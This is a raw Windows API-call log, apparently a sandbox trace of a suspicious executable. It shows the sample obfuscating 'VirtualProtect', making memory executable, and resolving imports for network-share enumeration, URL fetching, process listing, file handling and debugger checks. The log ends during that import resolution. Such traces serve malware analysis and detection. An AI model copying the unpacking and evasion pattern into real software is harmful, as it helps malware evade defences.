GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.067] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.068] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.069] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.070] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.071] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.072] GetLastError () returned 0x0 [0149.073] GetLastError () returned 0x0 [0149.073] GetLastError () returned 0x0 [0149.073] GetLastError () returned 0x0 [0149.073] GetLastError () returned 0x0 [0149.073] GetLastError () returned 0x0 [0149.073] GetLastError () returned 0x0 [0149.073] GetLastError () returned 0x0 [0149.073] GetLastError () returned 0x0 [0149.080] lstrlenA (lpString="") returned 0 [0149.091] lstrcpyW (in: lpString1=0x6acf68, lpString2="kernel32.dll" | out: lpString1="kernel32.dll") returned="kernel32.dll" [0149.091] LocalAlloc (uFlags=0x0, uBytes=0x90c98) returned 0x2060020 [0149.093] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0149.136] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0149.136] lstrcatA (in: lpString1="", lpString2="WertualProtect" | out: lpString1="WertualProtect") returned="WertualProtect" [0149.137] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0149.137] VirtualProtect (in: lpAddress=0x2060020, dwSize=0x90c98, flNewProtect=0x40, lpflOldProtect=0x18f5e8 | out: lpflOldProtect=0x18f5e8*=0x4) returned 1 [0149.180] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0149.180] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0149.181] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0149.181] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0149.181] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0149.181] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0149.181] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0149.181] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0149.181] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0149.184] Module32First (hSnapshot=0x58, lpme=0x18f370) returned 1 [0149.186] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x2100000 [0149.227] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0149.227] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0149.227] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0149.227] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0149.227] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0149.227] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0149.227] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0149.227] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0149.228] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0149.228] SetErrorMode (uMode=0x400) returned 0x0 [0149.228] SetErrorMode (uMode=0x0) returned 0x400 [0149.228] GetVersionExA (in: lpVersionInformation=0x18e2a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e2a0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0149.228] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x2220000 [0149.248] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f328 | out: lpflOldProtect=0x18f328*=0x2) returned 1 [0149.324] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0149.324] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0149.324] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0149.324] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0149.324] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0149.324] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0149.324] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75640000 [0149.378] GetProcAddress (hModule=0x75640000, lpProcName="WNetOpenEnumW") returned 0x75642f06 [0149.378] GetProcAddress (hModule=0x75640000, lpProcName="WNetEnumResourceW") returned 0x75643058 [0149.378] GetProcAddress (hModule=0x75640000, lpProcName="WNetCloseEnum") returned 0x75642dd6 [0149.378] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0149.395] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0149.396] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0149.396] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0149.396] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0149.396] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0149.396] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0149.396] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0149.396] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75600000 [0149.400] GetProcAddress (hModule=0x75600000, lpProcName="timeGetTime") returned 0x756026e0 [0149.400] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0149.400] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0149.400] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0149.400] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0149.401] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0149.401] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0149.401] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0149.401] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0149.401] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0149.401] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0149.401] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0149.401] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0149.401] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0149.401] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0149.401] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0149.402] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0149.402] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0149.402] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0149.402] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0149.402] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0149.402] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0149.402] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0149.402] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0149.402] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0149.402] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0149.403] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0149.403] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0149.403] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0149.403] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0149.403] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0149.403] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0149.403] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0149.403] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0149.403] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0149.403] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0149.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0149.404] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0149.404] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0149.404] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0149.404] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0149.404] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0149.404] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0149.404] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0149.404] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0149.404] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0149.404] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0149.405] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0149.405] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0149.405] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0149.405] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0149.405] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0149.405] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0149.405] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0149.405] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0149.405] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0149.405] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0149.405] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0149.406] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0149.406] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0149.406] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0149.406] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0149.406] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0149.406] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0149.406] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0149.406] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0149.406] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0149.406] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0149.406] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0149.407] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0149.407] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0149.407] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0149.407] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0149.407] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0149.407] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0149.407] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0149.407] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0149.407] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0149.407] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0149.407] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0149.408] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0149.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0149.408] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0149.408] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0149.408] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0149.408] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0149.408] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0149.408] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0149.408] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0149.408] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0149.408] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0149.409] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0149.409] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0149.409] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0149.409] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0149.409] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0149.409] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0149.409] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0149.409] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0149.409] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0149.409] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0149.409] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0149.409] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0149.410] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0149.411] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0149.412] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0149.412] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0149.412] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0149.412] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0149.412] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0149.412] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0149.412] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0149.412] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0149.412] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0149.412] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0149.412] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0149.412] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0149.413] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0149.413] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0149.413] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0149.413] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0149.413] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0149.413] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0149.413] 